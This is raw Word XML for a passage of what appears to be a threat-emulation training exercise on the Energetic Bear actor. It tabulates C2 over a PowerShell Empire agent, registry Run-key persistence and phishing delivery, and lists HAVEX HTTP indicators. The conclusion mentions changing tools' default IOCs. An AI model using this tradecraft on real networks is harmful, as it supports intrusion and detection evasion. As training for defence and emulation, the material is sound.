                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="1106472F" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2BE523" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Key IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B024463" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PowerShell Empire HTTP agent on TCP 80, Location: Memory Resident and PowerShell Script stored in Registry, HTTP matching HAVEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="2830712B" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38E598E9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>C2 Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B27FD62" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>HTTPS on port 80 with a 5 second callback. Calling directly to threat-owned domains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="5F996C5C" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65724CEB" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CFDCC74" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Initially delivered during exploitation. POST exploitation delivery via PowerShell commands. Enumeration and lateral movement via PS Empire and native Windows commands. Privilege escalation limited and determined POST exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="3824AC8C" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BDEE6C2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51475214" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Social Engineering via Phishing, watering hole, and supply chain via compromised web servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="6121FCC0" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FC442F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D0AA4B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Persistence via registry RUN key modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FEA352D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HAVEX HTTP Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070700FA" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD3397" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>v1=038&amp;v2=170393861&amp;q=5265…</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70E73F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496428FD" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;head&gt;&lt;mega http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">='CACHE-CONTROL' content='NO CACHE'&gt;&lt;/head&gt;&lt;body&gt;No </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Data!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>!--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>havexhavex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>--&gt;&lt;/body&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285483B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:anchor="conclusion" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E30BC7F" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">In this exercise, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>examined the Energetic Bear threat actor in order to design what a threat profile can be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC55C3" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You learned which IOCs are exposed when tools are kept to their default settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32FCF7" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You learned that the testing of tools before use is critical in understanding a tool’s IOC profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F9BD9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You changed the default IOCs of common security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AAA116" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You learned that some tools are easier than others to modify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAF5D2" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A18342D" w14:textId="77777777" w:rsidR="00214945" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD6D174" w14:textId="77777777" w:rsidR="00AE119A" w:rsidRDefault="00AE119A" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08720417" w14:textId="77777777" w:rsidR="00AE119A" w:rsidRDefault="00AE119A" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1FD7B7" w14:textId="77777777" w:rsidR="00AE119A" w:rsidRDefault="00AE119A" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DE2ACD" w14:textId="77777777" w:rsidR="00AE119A" w:rsidRDefault="00AE119A" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E58744E" w14:textId="2FAE5998" w:rsidR="00AE119A" w:rsidRPr="00643413" w:rsidRDefault="00AE119A" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                 </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AE119A" w:rsidRPr="00643413">
      <w:footerReference w:type="even" r:id="rId190"/>
      <w:footerReference w:type="default" r:id="rId191"/>
      <w:footerReference w:type="first" r:id="rId19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15899B" w14:textId="77777777" w:rsidR="00EB78A4" w:rsidRDefault="00EB78A4" w:rsidP="00425372">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62D7DF25" w14:textId="77777777" w:rsidR="00EB78A4" w:rsidRDefault="00EB78A4" w:rsidP="004253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03F83" w14:textId="5BC5047C" w:rsidR="00425372" w:rsidRDefault="00425372">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3049E270" wp14:editId="57588D7E">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>bottom</wp:align>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="4445" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="2" name="Text Box 2" descr="Gener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22F20D2" w14:textId="350AD2F5" w:rsidR="00425372" w:rsidRPr="00425372" w:rsidRDefault="00425372" w:rsidP="00425372">
                          <w:pPr>
                            <w:spacing w:after="0"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00425372">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                            <w:t>General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3049E270" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" alt="General" style="position:absolute;margin-left:0;margin-top:0;width:34.95pt;height:34.95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" filled="f" stroked="f">
              <v:fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="122F20D2" w14:textId="350AD2F5" w:rsidR="00425372" w:rsidRPr="00425372" w:rsidRDefault="00425372" w:rsidP="00425372">
                    <w:pPr>
                      <w:spacing w:after="0"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00425372">
                      <w:rPr>
